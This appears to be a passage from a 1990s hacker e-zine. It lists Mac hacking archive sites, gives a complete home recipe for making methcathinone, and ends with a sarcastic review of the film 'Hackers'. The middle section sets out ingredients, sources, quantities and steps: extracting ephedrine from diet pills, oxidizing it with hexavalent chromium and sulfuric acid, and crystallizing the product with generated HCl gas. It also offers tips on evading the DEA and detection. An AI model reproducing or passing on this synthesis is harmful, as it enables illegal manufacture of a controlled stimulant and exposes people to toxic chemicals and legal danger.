are all of the Mac hacking ftp and Web sites I know of:
|
|||
|
Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
|
|||
|
This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
|
|||
|
It is probably the largest and best archive of Mac hacking software
|
|||
|
connected to the Internet. The problem with this is that it can't handle
|
|||
|
more than two anonymous users, meaning that unless you pay to be part of
|
|||
|
L0pht, you will never get into this archive. I've tried getting up at 4:30
|
|||
|
AM, thinking that no one in their right mind would possibly be awake at
|
|||
|
this time, but there is always, somehow, somewhere, two people in Iceland
|
|||
|
or Singapore or somewhere on this site.
|
|||
|
The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
|
|||
|
This site does not look like much, and it is fairly obvious that
|
|||
|
its maintainer, Sean Warren, is still learning HTML, but it is reliable and
|
|||
|
is a good archive. It is still growing, probably due to the fact that it is
|
|||
|
one of the only Internet Mac hacking sites anyone can get to and upload.
|
|||
|
Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
|
|||
|
This is an excellent site and has many good programs. There is one
|
|||
|
catch, however. It's maintainer, Ole Buzzard, is actually getting the files
|
|||
|
from his BBS. So many of the really good files are locked away in the k0p
|
|||
|
BBS, and those of us who can't pay long distance can't get the files. Oh
|
|||
|
well.
|
|||
|
Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
|
|||
|
(http://www.lib.iup.edu/~seaman/index.html)
|
|||
|
While this is hardly a Macintosh hacking site, it's just a hacking
|
|||
|
site, it does have very few Mac files, some of which are hard to get to.
|
|||
|
However, Bone might get expelled because of a long story involving AOHell,
|
|||
|
so this page might not be here. Then again, maybe Bone won't get expelled
|
|||
|
and this site will stay. Never can tell 'bout the future, can you?
|
|||
|
"We predict the future. We invent it."
|
|||
|
-Nasty government guy on the season premiere of _The X-Files_
|
|||
|
|
|||
|
Andy Ryder
|
|||
|
Netsurfer and Road Warrior on the Info Highway
|
|||
|
I've pestered Bruce Sterling _and_ R.U. Sirius!
|
|||
|
As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
|
|||
|
Once scored 29,013,920 points on Missile Command
|
|||
|
|
|||
|
"This Snow Crash thing- is it a virus, a drug, or a religion?"
|
|||
|
-Hiro Protagonist
|
|||
|
"What's the difference?"
|
|||
|
-Juanita Marquez
|
|||
|
|
|||
|
"...one person's 'cyberpunk' is another's everyday obnoxious teenager with
|
|||
|
some technical skill thrown in..."
|
|||
|
-Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
|
|||
|
"More than _some_ technical skill."
|
|||
|
-Andy Ryder
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
Making Methcathinone
|
|||
|
|
|||
|
Compiled
|
|||
|
|
|||
|
by Anonymous
|
|||
|
|
|||
|
|
|||
|
Ok, this has got to be the easiest drug made at home (by far). This is very
|
|||
|
similar to methamphetamine in structure, effect, and use. Typical doses
|
|||
|
start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add
|
|||
|
10 mg) or through mucous membranes (nasally).
|
|||
|
|
|||
|
Ingredients:
|
|||
|
Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
|
|||
|
Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
|
|||
|
Conc. Sulfuric acid - it's up to you where you get this. Contact me if you
|
|||
|
need help locating it.
|
|||
|
Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
|
|||
|
is used for cleaning concrete.
|
|||
|
Sodium Hydroxide - Hardware stores. AKA lye.
|
|||
|
Toluene - Hardware store, paint store.
|
|||
|
|
|||
|
Lab equipment:
|
|||
|
1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
|
|||
|
125 mL separatory funnel - same as above
|
|||
|
glass tubing - same as above
|
|||
|
|
|||
|
Buchner funnel - This is a hard to find item, but must schools have at least
|
|||
|
one. They are usually white porcelain or plastic. They look
|
|||
|
like a funnel with a flat disk in the bottom with lots of
|
|||
|
holes in it. If you need one, arrangements can be made.
|
|||
|
Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00
|
|||
|
|
|||
|
References to Edmund's Scientific Co, in NJ, are accurate. You have to go
|
|||
|
to their "Lab Surplus/Mad Scientist" room. The prices are incredible.
|
|||
|
This place is definitely a recommended stopping sight for anybody going
|
|||
|
through New Jersey. It is located in "Barrington", about 30 minutes from
|
|||
|
center city Philadelphia.
|
|||
|
All of the above can be purchased from "The Al-Chymist". Their number is
|
|||
|
(619)948-4150. Their address is: 17525 Alder #49
|
|||
|
Hesperia, Ca 92345
|
|||
|
Call and ask for a catalog.
|
|||
|
|
|||
|
That's it. The body of this article is stolen from the third edition of
|
|||
|
"Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried
|
|||
|
and proven method by many people. If you want a copy of this book, contact
|
|||
|
me.
|
|||
|
|
|||
|
Good luck and keep away from the DEA
|
|||
|
|
|||
|
|
|||
|
M E T H C A T H I N O N E
|
|||
|
|
|||
|
K I T C H E N I M P R O V I E S E D C R A N K
|
|||
|
|
|||
|
|
|||
|
The latest designer variant upon the amphetamine molecule to gain
|
|||
|
popularity and publicity is methcathinone, commonly called cat. This
|
|||
|
substance is remarkably similar to the active ingredient found in the
|
|||
|
leaves of the khat tree which the loyal drug warriors on the network news
|
|||
|
blame for turning peace loving Somalis into murderous psychopaths. The
|
|||
|
active ingredient in the khat leaves is cathinone, which has the same
|
|||
|
structural relationship to methcathinone that amphetamine has to
|
|||
|
methamphetamine. It is made by oxidizing ephedrine, while meth can be
|
|||
|
made by reducing ephedrine.
|
|||
|
|
|||
|
The high produced by methcathinone is in many ways similar to
|
|||
|
methamphetamine. For something so easily made and purified, it is
|
|||
|
actually quite enjoyable. the main differences between the meth high and
|
|||
|
the methcathinone high are length of action and body fell. With
|
|||
|
methcathinone, one can expect to still get to sleep about 8 hours after a
|
|||
|
large dose. On the down side, it definitely gives me the impression that
|
|||
|
the substance raises the blood pressure quite markedly. This drug may not
|
|||
|
be safe for people with weak hearts of blood vessels. Be warned!
|
|||
|
|
|||
|
Cat is best made using chrome in the +6 oxidation state as the
|
|||
|
oxidizer. I recall seeing an article in the narco swine's Journal of
|
|||
|
Forensic Science bragging about how they worked out a method for making it
|
|||
|
using permanganate, but that method gives an impure product in low yields.
|
|||
|
Any of the common hexavalent chrome salts can be used as the oxidizer in
|
|||
|
this reaction. This list include chrome trioxide (CrO3), sodium or
|
|||
|
potassium chromate (Na2CrO4), and sodium or potassium dichromate
|
|||
|
(Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is
|
|||
|
used in great quantities in chrome plating. The chromates are used in
|
|||
|
tanning and leather making.
|
|||
|
|
|||
|
To make methcathinone, the chemist starts with the water extract of
|
|||
|
ephedrine pills. The concentration of the reactants in this case is not
|
|||
|
critically important, so it is most convenient to use the water extract of
|
|||
|
the pills directly after filtering without any boiling away of the water.
|
|||
|
See the section at the beginning of Chapter 15 [I included this at the end
|
|||
|
of the file] on extracting ephedrine form pills. Both ephedrine
|
|||
|
hydrochloride and sulfate can be used in this reaction.
|
|||
|
|
|||
|
The water extract of 1000 ephedrine pills is placed into any
|
|||
|
convenient glass container. A large measuring cup is probably best since
|
|||
|
it has a pouring lip. Next, 75 grams of any of the above mentioned +6
|
|||
|
chrome compounds are added. They dissolve quite easily to form a reddish
|
|||
|
or orange colored solution. Finally, concentrated sulfuric acid is added.
|
|||
|
If CrO3 is being used, 21 mL is enough for the job. If one of the
|
|||
|
chromates is being used, 42 mL is called for. These ingredients are
|
|||
|
thoroughly mixed together, and allowed to sit for several hours with
|
|||
|
occasional stirring.
|
|||
|
|
|||
|
After several hours have passed, lye solution is added to the batch
|
|||
|
until it is strongly basic. Very strong stirring accompanies this process
|
|||
|
to ensure that the cat is converted to the free base. Next, the batch is
|
|||
|
poured into a sep funnel, and a couple hundred mLs of toluene is added.
|
|||
|
Vigorous shaking, as usual, extracts the cat into the toluene layer. It
|
|||
|
should be clear to pale yellow in color. The water layer should be orange
|
|||
|
mixed with green. The green may settle out as a heavy sludge. The water
|
|||
|
layer is thrown away, and the toluene layer containing the cat is washed
|
|||
|
once with water, then poured into a beaker. Dry HCl gas is passed through
|
|||
|
the toluene as described in Chapter 5 [I included this at the end of the file]
|
|||
|
to get white crystals of cat. The yield is between 15 and 20
|
|||
|
grams. This reaction is scaled up quite easily.
|
|||
|
|
|||
|
|
|||
|
CHAPTER 15 (part of it anyway)
|
|||
|
|
|||
|
P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E
|
|||
|
F R O M S T I M U L A N T P I L L S
|
|||
|
|
|||
|
In the present chemical supply environment, the best routes for making
|
|||
|
meth start with ephedrine as the raw material. To use these routes, a
|
|||
|
serious hurdle must first be overcome. This hurdle is the fact that the
|
|||
|
most easily obtained source of ephedrine, the so-called stimulant or
|
|||
|
bronchodilator pills available cheaply by mail order, are a far cry from
|
|||
|
the pure starting material a quality minded chemist craves. Luckily,
|
|||
|
there is a simple and very low profile method for separating the fillers
|
|||
|
in these pills from the desired active ingredient they contain.
|
|||
|
|
|||
|
A superficial paging through many popular magazines[New Body is where
|
|||
|
I found it at GNC] reveals them to be brim full of ads
|
|||
|
from mail order outfits offering for sale "stimulant" or "bronchodilator"
|
|||
|
pills. These are the raw materials today's clandestine operator requires
|
|||
|
to manufacture meth without detection. The crank maker can hide amongst
|
|||
|
the huge herd of people who order these pills for the irritating and
|
|||
|
nauseating high that can be had by eating them as is. I have heard of a
|
|||
|
few cases where search warrants were obtained against people who ordered
|
|||
|
very large numbers of these pills, but I would think that orders of up to
|
|||
|
a few thousand pills would pass unnoticed. If larger numbers are
|
|||
|
required, maybe one's friends could join in the effort.
|
|||
|
|
|||
|
The first thing one notices when scanning these ads is the large
|
|||
|
variety of pills offered for sale. When one's purpose is to convert them
|
|||
|
into methamphetamine, it is very easy to eliminate most of the pills
|
|||
|
offered for sale. Colored pills are automatically rejected because one
|
|||
|
does not want the coloring to be carried into the product. Similarly,
|
|||
|
capsules are rejected because individually cutting open capsules is just
|
|||
|
too much work. Bulky pills are to be avoided because they contain too much
|
|||
|
filler. The correct choice is white cross thins, preferably containing
|
|||
|
ephedrine HCl instead of sulfate, because the HCl salt can be used in more
|
|||
|
of the reduction routes than can the sulfate.
|
|||
|
|
|||
|
Once the desired supply of pills is in hand, the first thing which
|
|||
|
should be done is to weigh them. This will give the manufacturer an idea
|
|||
|
of how much of the pills is filler, and how much is active ingredient.
|
|||
|
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
|
|||
|
contains 25 grams of active ingredient. A good brand of white cross thins
|
|||
|
will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl
|
|||
|
may not sound like much, but if it is all recovered from these pills, it
|
|||
|
is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three
|
|||
|
or four thousand dollars, not a bad return on the twenty odd dollars a
|
|||
|
thousand lot of such pills costs. [I don't know where he got 3 or 4
|
|||
|
thousand dollars from, but the pills go for about $35.00/1000 now. 2
|
|||
|
months ago they were $25.00 but now they have to do more paper work
|
|||
|
because it is a DEA controlled substance]
|
|||
|
|
|||
|
To extract the ephedrine from the pills, the first thing which must be
|
|||
|
done is to grind them into a fine powder. This pulverization must be
|
|||
|
thorough in order to ensure complete extraction of the ephedrine form the
|
|||
|
filler matrix in which it is bound. A blender does a fine job of this
|
|||
|
procedure, as will certain brands of home coffee grinders.
|
|||
|
|
|||
|
Next, the powder from 1000 pills is put into a glass beaker, or other
|
|||
|
similar container having a pouring lip, and about 300 mL of distilled
|
|||
|
water is added. Gentle heat is then applied to the beaker, as for example
|
|||
|
on a stove burner, and with steady stirring the contents of the beaker are
|
|||
|
slowly brought up to a gentle boil. It is necessary to stir constantly
|
|||
|
because of the fillers will settle to the bottom of the beaker and cause
|
|||
|
burning if not steadily stirred.
|
|||
|
|
|||
|
Once the contents of the beaker have been brought to a boil, it is
|
|||
|
removed from the heat and allowed to settle. Then the water is poured out
|
|||
|
of the beaker through a piece of filter paper. The filtered water should
|
|||
|
be absolutely clear. Next, another 50 mL of water is added to the pill
|
|||
|
filler sludge, and it too is heated with stirring. Finally, the pill
|
|||
|
sludge is poured into the filter, and the water it contains is allowed to
|
|||
|
filter through. It too should be absolutely clear, and should be mixed in
|
|||
|
with the first extract. A little water may be poured over the top of the
|
|||
|
filler sludge to get the last of the ephedrine out of it. This sludge
|
|||
|
should be nearly tasteless, and gritty in texture. The water extract
|
|||
|
should taste very bitter, as it contains the ephedrine.
|
|||
|
|
|||
|
The filtered water is now returned to the stove burner, and half of
|
|||
|
the water it contains is gently boiled away. Once this much water has
|
|||
|
been boiled off, precautions should be taken to avoid burning the
|
|||
|
ephedrine. The best alternative is to evaporate the water off under a
|
|||
|
vacuum. If this is not practical with the equipment on hand, the water
|
|||
|
may be poured into a glass baking dish. This dish is then put into the
|
|||
|
oven with the door cracked open, and the lowest heat applied. In no time
|
|||
|
at all, dry crystals of ephedrine HCl can be scraped out of the baking
|
|||
|
dish with a razor blade. The serious kitchen experimenter may wish to
|
|||
|
further dry them in a microwave.
|
|||
|
|
|||
|
Chapter 5 (The part about the HCl gas)
|
|||
|
|
|||
|
A source of anhydrous hydrogen chloride gas is now needed. The
|
|||
|
chemist will generate his own. The glassware is set up as in Figure 1.
|
|||
|
He will have to bend another piece of glass tubing to the shape shown. It
|
|||
|
should start out about 18 inches long. One end of it should be pushed
|
|||
|
through a one hole stopper. A 125 mL sep funnel is the best size. The
|
|||
|
stoppers and joints must be tight, since pressure must develop inside this
|
|||
|
flask to force the hydrogen chloride gas out through the tubing as it is
|
|||
|
generated.
|
|||
|
|
|||
|
Into the 1000 mL, three-necked flask is placed 200 grams of table
|
|||
|
salt. Then 25% concentrated hydrochloric acid is added to this flask until
|
|||
|
it reaches the level shown in the figure. The hydrochloric acid must be
|
|||
|
of laboratory grade [I use regular muriatic acid for pools].
|
|||
|
|
|||
|
Figure 1:
|
|||
|
\ /
|
|||
|
\ /ķ
|
|||
|
ֽ ӷ <--125 mL separatory funnel
|
|||
|
|
|||
|
|
|||
|
ӷ ֽ
|
|||
|
ķ Ľ glass tubing Ŀ
|
|||
|
ӷ ֽ
|
|||
|
ͻ
|
|||
|
stopcock->ۺĴ Salt and Hydrochloric acid
|
|||
|
stopper ->ķ \/з ķ <-1 hole mixed into a paste by add-
|
|||
|
ĺ ĺ stopper ing HCL to salt and mixing.
|
|||
|
Ľ Ľ Ľ ķ The surface should be rough
|
|||
|
ֽ ӷ and a good number of holes
|
|||
|
should be poked into the
|
|||
|
1000 mL, 3 neck flask paste for long lasting
|
|||
|
generation of HCl gas.
|
|||
|
ӷ acid/salt level ֽ
|
|||
|
ķ Ľ
|
|||
|
ķ Ľ
|
|||
|
ķ Ľ
|
|||
|
Ľ
|
|||
|
|
|||
|
|
|||
|
Some concentrated sulfuric acid (96-98%) is put into the sep funnel
|
|||
|
and the spigot turned so that 1 mL of concentrated sulfuric acid flows
|
|||
|
into the flask. It dehydrates the hydrochloric acid and produces hydrogen
|
|||
|
chloride gas. This gas is then forced by pressure through the glass
|
|||
|
tubing.
|
|||
|
|
|||
|
One of the Erlenmeyer flasks containing methamphetamine in solvent is
|
|||
|
placed so that the glass tubing extends into the methamphetamine, almost
|
|||
|
reaching the bottom of the flask. Dripping in more sulfuric acid as
|
|||
|
needed keeps the flow of gas going to the methamphetamine. If the flow if
|
|||
|
gas is not maintained, the methamphetamine may solidify inside the glass
|
|||
|
tubing, plugging it up.
|
|||
|
|
|||
|
Within a minute of bubbling, white crystals begin to appear in the
|
|||
|
solution, More and more of them appear as the process continues. It is an
|
|||
|
awe-inspiring sight. In a few minutes, the solution becomes as thick as
|
|||
|
watery oatmeal.
|
|||
|
|
|||
|
It is now time to filter out the crystals, which is a two man job.
|
|||
|
The flask with the crystals in it is removed from the HCl source and
|
|||
|
temporarily set aside. The three-necked flask is swirled a little to
|
|||
|
spread around the sulfuric acid and then the other Erlenmeyer flask is
|
|||
|
subjected to a bubbling with HCl. While this flask is being bubbled, the
|
|||
|
crystals already in the other flask are filtered out.
|
|||
|
|
|||
|
The filtering flask and Buchner funnel are set up as shown in figure
|
|||
|
2. The drain stem of the buchner funnel extends all the way through the
|
|||
|
rubber stopper, because methamphetamine has a nasty tendency to dissolve
|
|||
|
rubber stoppers. This would color the product black. A piece of filter
|
|||
|
paper covers the flat bottom of the Buchner funnel. The vacuum is turned
|
|||
|
on and the hose attached to the vacuum nipple. Then the crystals are
|
|||
|
poured into the Buchner funnel. The solvent and uncrystallized
|
|||
|
methamphetamine pass through the filter paper and the crystals stay in the
|
|||
|
Buchner funnel as a solid cake. About 15 mL of solvent is poured into the
|
|||
|
Erlenmeyer flask. the top of the flask is covered with the palm and it is
|
|||
|
shaken to suspend the crystals left clinging to the sides. This is also
|
|||
|
poured into the Buchner funnel. Finally, another 15 mL of solvent is
|
|||
|
poured over the top of the filter cake.
|
|||
|
|
|||
|
|
|||
|
Figure 2:
|
|||
|
Ŀ
|
|||
|
<-Bchner Funnel
|
|||
|
___________
|
|||
|
\ /
|
|||
|
\ /
|
|||
|
\ /
|
|||
|
Ŀ
|
|||
|
<--To vacuum
|
|||
|
Ŀ
|
|||
|
|
|||
|
|
|||
|
Ŀ
|
|||
|
Filtering
|
|||
|
flask-->
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Now the vacuum hose is disconnected and the Buchner funnel, stopper
|
|||
|
and all, is pulled from the filtering flask. All of the filtered solvent
|
|||
|
is poured back into the erlenmeyer flask it came from. It is returned to
|
|||
|
the HCl source for more bubbling. The Buchner funnel is put back into the
|
|||
|
top of the filtering flask. It still contains the filter cake of
|
|||
|
methamphetamine crystals. It will now be dried out a little bit. The
|
|||
|
vacuum is turned back on, the vacuum hose is attached to the filtering
|
|||
|
flask, and the top of the Buchner funnel is covered with the palm or
|
|||
|
section of latex rubber glove. The vacuum builds and removes most of the
|
|||
|
solvent from the filter cake. This takes about 60 seconds. The filter
|
|||
|
cake can now be dumped out onto a glass or China plate (not plastic) by
|
|||
|
tipping the Buchner funnel upside-down and tapping it gently on the plate.
|
|||
|
|
|||
|
And so, the filtering process continues, one flask being filtered
|
|||
|
while the other one is being bubbled with HCl. Solvent is added to the
|
|||
|
Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each
|
|||
|
flask has been bubbled for about seven times, no more crystal will come
|
|||
|
out and the underground chemist is finished.
|
|||
|
|
|||
|
If ether was used as the solvent, the filter cakes on the plates will
|
|||
|
be nearly dry now. With a knife from the silverware drawer, the cakes are
|
|||
|
cut into eighths. They are allowed to dry out some more then chopped up
|
|||
|
into powder. If benzene was used, this process takes longer. Heat lamps
|
|||
|
may be used to speed up this drying, but no stronger heat source.
|
|||
|
|
|||
|
[The above section of chapter 5 is talking about methamphetamine. You
|
|||
|
could, in most instances, substitute the word methcathinone, but I wanted
|
|||
|
to present the text to you in its exact form.]
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
Review of "HACKERS"
|
|||
|
|
|||
|
By Wile Coyote
|
|||
|
|
|||
|
Sorry, it might be a little long... cut it to ribbons if you want, most
|
|||
|
of it is just a rant anyway... Hope you enjoy it.
|
|||
|
|
|||
|
First off, I have to admit that I was biased going into the movie
|
|||
|
"Hackers"... I heard that it wasn't going to be up to snuff, but did I
|
|||
|
let that stop me? No, of course not... I sucked up enough courage to
|
|||
|
stride towards my girlfriend and beg for seven bucks... :) She ended up
|
|||
|
wanting to see the movie herself (and sadly, she rather enjoyed it...
|
|||
|
oh, well, what can you do with the computer illiterate or is it the
|
|||
|
computer illegitimate?). Now onto....
|
|||
|
|
|||
|
THE MOVIE
|
|||
|
|
|||
|
(Yes, I AM going to give you a second-by-second playback of the
|
|||
|
movie... you don't want me to spoil the plot, you say? Well, don't
|
|||
|
worry, there is no plot to spoil! :) just kidding, go see it... maybe
|
|||
|
you'll like it...)
|
|||
|
|
|||
|
Well, from the very first few seconds, I was unimpressed... It begins
|
|||
|
with an FBI raid on some unsuspecting loose (who turns out to be the
|
|||
|
main character, but that's later) named Zero Cool (can you say "EL1EEEEET
|
|||
|
WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey,
|
|||
|
cinematography counts!) But, the acting was worse. The Feds bust into
|
|||
|
this home and run up the stairs, all while this lady (the mom) just kind
|
|||
|
of looks on dumbfounded and keeps saying stuff like "hey, stop that...",
|
|||
|
or something (is this what a raid is like? I've never had the pleasure...)
|
|||
|
|
|||
|
Ok, so the story goes on like this: The 11 year old kid made a computer
|
|||
|
virus that he uploads to, I think, the NY stock exchange, and it crashes
|
|||
|
1,507 computers. There is a really lame court scene where the kid is
|
|||
|
sentenced to 7 years probation where he can't use a computer or a
|
|||
|
touch-tone phone... That was 1988...
|
|||
|
|
|||
|
Time passes... Now it's 1995, and boy have things changed (except the
|
|||
|
mom... hmmm....). Now the ex-hacker is allowed to use a computer (his
|
|||
|
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?)
|
|||
|
boxing some TV station to change the program on television (yes, I know
|
|||
|
that all of you super-el33t hackers hack into TV stations when you don't
|
|||
|
like what's on Ricki Lake!). N-e-way, while hacking into their
|
|||
|
super-funky system (the screen just kind of has numbers moving up and
|
|||
|
down the screen like some kind of hex-editor on acid...)
|
|||
|
he gets into a "hacking battle" with some other hacker called Acid Burn
|
|||
|
(I don't think I have ever seen such a trippy view of the "Internet"...
|
|||
|
lots of Very high-end graphics, not very realistic, but it's Hollywood...).
|
|||
|
In the end, the other hacker kicks the shit out of him (he has changed
|
|||
|
his handle to Crash Override now, just to be cool, i guess) and logs him
|
|||
|
off the TV station. Wow, tense... cough...
|
|||
|
|
|||
|
For those of you who care, let me describe the "hacker" Crash Override:
|
|||
|
He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is
|
|||
|
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky)
|
|||
|
clothes, and the CDC might have quite a bit to say about the amount of
|
|||
|
leather he wears... I mean, there are limits to that kind of stuff, man!
|
|||
|
And to top off his coolness, he is, like, the roller-blade king of the
|
|||
|
world. (Not that hackers don't roller-blade, but he does it just Soooo
|
|||
|
much cooler than I could... :) ). And yet, here's the nifty part,
|
|||
|
despite all of his deft coolness, he couldn't get a girl for the life
|
|||
|
of him (we all morn for him in silent prayer).
|
|||
|
|
|||
|
Ok, so now Crash is at school, and he meets Wonderchick (who is
|
|||
|
EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she
|
|||
|
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to
|
|||
|
spoil the suspense).
|
|||
|
|
|||
|
Now, while at school, he wants to hook up with wonderchick, so he breaks
|
|||
|
into the school's computer (it must be a fucking Cray to support all of
|
|||
|
the high-end-type graphics that this dude is pulling up) and gets his
|
|||
|
English(?) class changed to hers. So, some other super-d00dcool hacker
|
|||
|
spots him playing around with the schools computer (it's funny how may
|
|||
|
elite hackers one can meet in a new york public school...), so he
|
|||
|
catches up with Crash and invites you to an elite (Oh, if you ever want
|
|||
|
to see a movie where the word 3l333333333t is used, like a fucking
|
|||
|
million times, then go see Hackers...) hackerz-only club, complete with
|
|||
|
million-dollar virtual-reality crap and even a token phreaker trying to
|
|||
|
red-box a pay-phone with a cassette recorder (never mind that the music is
|
|||
|
about 197 decibels, the phone can still pick up the box tones...).
|
|||
|
|
|||
|
What follows is that Crash meets up with some seriously k-rad hackers
|
|||
|
(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and
|
|||
|
Phantom Phreak : who reminds of that gay kid on "my so called life...
|
|||
|
maybe that was him?";Lord Nikon : the token black hacker... Photographic
|
|||
|
memory is his super-power). They talk about k00l pseudo-hacker shit and
|
|||
|
then a l00ser warez-type guy comes up and tries to be El33t like everybody
|
|||
|
else. He is just about the ONLY realistic character in the whole movie.
|
|||
|
He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps
|
|||
|
saying "I need a handle, then I'll be el33t!". (Why he can't just pick
|
|||
|
his own handle, like The Avenging Turd or something, is beyond me... He
|
|||
|
plays lamer better than the kids in Might Morphin Power Rangers... awesome
|
|||
|
actor!). N-e-way, this is where the major discrepancies start. Ok,
|
|||
|
first they try to "test" Lamerboy by asking him what the four most used
|
|||
|
passwords are. According to the movie, they are "love, sex, god, and
|
|||
|
secret". (Hmmmm.... I thought Unix required a 6-8 char. password....).
|
|||
|
Somehow lamerboy got into a bank and screwed with an ATM machine four
|
|||
|
states away; all of the hacker chastise him for being stupid and hacking
|
|||
|
at home (If you watch the movie, you'll notice that the hackers use just
|
|||
|
about every pay-phone in the city to do their hacking, no, THAT doesn't
|
|||
|
look suspicious)Next they talk about "hacking a Gibson".
|
|||
|
(I was informed that they WANTED to use "hacking a Cray",
|
|||
|
but the Cray people decided that they didn't want THAT kind of publicity.
|
|||
|
I've never heard of a Gibson in real life, though...).
|
|||
|
They talk about how k-powerful the security is on a Gibson, and they say
|
|||
|
that if Lamerboy can crack one, then he gets to be elite.
|
|||
|
|
|||
|
Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash
|
|||
|
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy
|
|||
|
finally cracks a Gibson with the password God (never mind a Login name or
|
|||
|
anything that cool). Then the cheese begins in full force. The Gibson
|
|||
|
is like a total virtual-reality thingy. Complete with all sorts of cool
|
|||
|
looking towers and neon lightning bolts and stuff. Lamerboy hacks into a
|
|||
|
garbage file (did I mention that the entire world is populated by Macs?
|
|||
|
Oh, I didn't... well, hold on :)...). So, this sets alarms off all
|
|||
|
over the place (cause a top-secret file is hidden in the garbage, see?),
|
|||
|
and the main bad-guy, security chief Weasel, heads out to catch him. He
|
|||
|
plays around with some neon, star-trek-console, buttons for a while,
|
|||
|
then calls the "feds" to put a trace on the kid. La de da, ess catches him
|
|||
|
in a second, and the kid only gets half of the file, which he hides.
|
|||
|
(to spoil the suspense, yet again, the file is some kind of money getting
|
|||
|
program, like the kind some LOD members wrote about a long time ago in
|
|||
|
Phrack, which pulls money from each transaction and puts it into
|
|||
|
a different account. Needless to say, the Security Weasel is the guy who
|
|||
|
wrote it, which is why he needs it back, pronto!).
|
|||
|
|
|||
|
As we travel along the movie, the hackers keep getting busted for tapping
|
|||
|
into the Gibson, and they keep getting away. The "action" heats up when
|
|||
|
Wonderchick and Crash get into a tiff and they decide to have a hacking
|
|||
|
contest... They go all over the city trying their best to fuck with
|
|||
|
the one fed they don't like.... Brilliant move, eh? The movie kind of
|
|||
|
reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
|
|||
|
They all fondle over the machine with the same intensity that Captain Kirk
|
|||
|
gave to fighting Klingons, and frankly, their acting abilities seems
|
|||
|
to ask "please deposit thirty-five cents for the next three minutes".
|
|||
|
It was funny listening to the actors, 'cause they didn't know shit about
|
|||
|
what they were saying... Here's a clip:
|
|||
|
|
|||
|
Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not
|
|||
|
Kbps, mind you :)...I wonder where they designed a .8 of a bit?)
|
|||
|
|
|||
|
Yeah! Cool... Hey what kind of chip does it have in it?
|
|||
|
|
|||
|
A P6! Three times faster than a Pentium.... Yep, RISC is the wave of
|
|||
|
the future... (I laughed so hard..... Ok, first of all, it is a Mac.
|
|||
|
Trust me, it has the little apple on the cover. Second it has a P6, what
|
|||
|
server she ripped this out of, I dare not ask. How she got that
|
|||
|
bastard into a laptop without causing the casing to begin melting is
|
|||
|
yet another problem... those get very hot, i just read about them
|
|||
|
in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6,
|
|||
|
because it has RISC coding....
|
|||
|
|
|||
|
I kinda wished I had stayed for the credits to see the line:
|
|||
|
|
|||
|
Technical advisor None.... died on route to work...)
|
|||
|
|
|||
|
Finally they ask something about the screen, and they find out it is
|
|||
|
an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!
|
|||
|
|
|||
|
They do lots of nifty things with their magic laptops (I noticed that they
|
|||
|
ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say
|
|||
|
you can't hack on a mac, 'cause really you can hack on a TI-81 if you've
|
|||
|
got the know.... but please, not EVERYONE in the fucking movie
|
|||
|
has to have the exact same computer (different colors, though... there
|
|||
|
was a really cool clear one).... it got really sad at the end), and they
|
|||
|
finally find out what the garbage file that Lamerboy stole was, this time
|
|||
|
using a hex editor/CAD program of some sort.
|
|||
|
|
|||
|
As we reach the end of the movie, the hackers enlist the help of two very
|
|||
|
strangely painted phone phreaks who give the advice to the hackers to send
|
|||
|
a message to all of the hackers on the 'net, and together, they all
|
|||
|
kicked some serious ass with the super-nifty-virtual-reality Gibson.
|
|||
|
|
|||
|
In the end, all of the Hackers get caught except for one, who pirates all
|
|||
|
of the TV station in the world and gives the police the "real" story...
|
|||
|
So, the police politely let them go, no need for actually proving that the
|
|||
|
evidence was real or anything, of course.
|
|||
|
|
|||
|
So, in the end, I had to say that the movie was very lacking. It seemed
|
|||
|
to be more of a Hollywood-type flashy movie, than an actual documentary
|
|||
|
about hackers. Yes, I know an ACTUAL movie about hacker would suck, but
|
|||
|
PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It
|
|||
|
may have sucked less if they didn't put flashing, 64 million color,
|
|||
|
fully-rendered, magically delicious pictures floating all over the screen
|
|||
|
instead of just a simple "# " prompt at the bottom. With all of the
|
|||
|
super-easy access to all of the worlds computers, as depicted in the movie,
|
|||
|
ANYBODY can be a hacker, regardless of knowledge, commitment, or just
|
|||
|
plain common sense. And that's what really made it suck...
|
|||
|
|
|||
|
Hope you enjoyed my review of HACKERS!
|
|||
|
|
|||
|
|
|||
